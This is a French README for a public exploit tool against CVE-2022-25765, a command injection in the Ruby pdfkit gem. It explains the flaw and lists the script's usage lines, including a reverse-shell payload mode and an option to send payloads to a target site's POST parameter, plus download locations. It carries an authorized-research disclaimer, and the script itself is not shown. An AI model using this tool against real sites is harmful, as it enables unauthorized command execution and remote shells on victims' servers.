
Exploit pour CVE-2022–25765 (pdfkit) - Injection de commandes

Vous aimez ce dépôt ? Donnez-nous une ⭐ !
À des fins éducatives et de recherche en sécurité autorisée uniquement.
@UNICORDev par (@NicPWNs et @Dev-Yeoj)
Le package pdfkit à partir de la version 0.0.0 est vulnérable à l'injection de commandes car l'URL n'est pas correctement nettoyée.
Une gemme Ruby pdfkit est couramment utilisée pour convertir des sites web ou du HTML en documents PDF. Les versions vulnérables (< 0.8.7.2) de ce logiciel peuvent recevoir une URL spécialement conçue contenant une commande qui sera exécutée. Cet exploit génère des URL exécutables ou les envoie à un site web vulnérable utilisant pdfkit.
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
-c Mode commande personnalisée. Fournissez la commande pour générer une charge utile personnalisée.
-s Mode shell inversé. Fournissez l'IP locale et le port pour générer une charge utile de shell inversé.
-w URL du site web utilisant pdfkit vulnérable. (Optionnel)
-p Paramètre POST sur le site web utilisant pdfkit vulnérable. (Optionnel)
-h Affiche ce menu d'aide.
Télécharger exploit-CVE-2022-25765.py depuis GitHub
Télécharger exploit-CVE-2022-25765.py depuis ExploitDB
searchsploit -u
searchsploit -m 51293


pdfkit version 0.8.6
pdfkit versions < 0.8.7.2
gem install pdfkit -v 0.8.6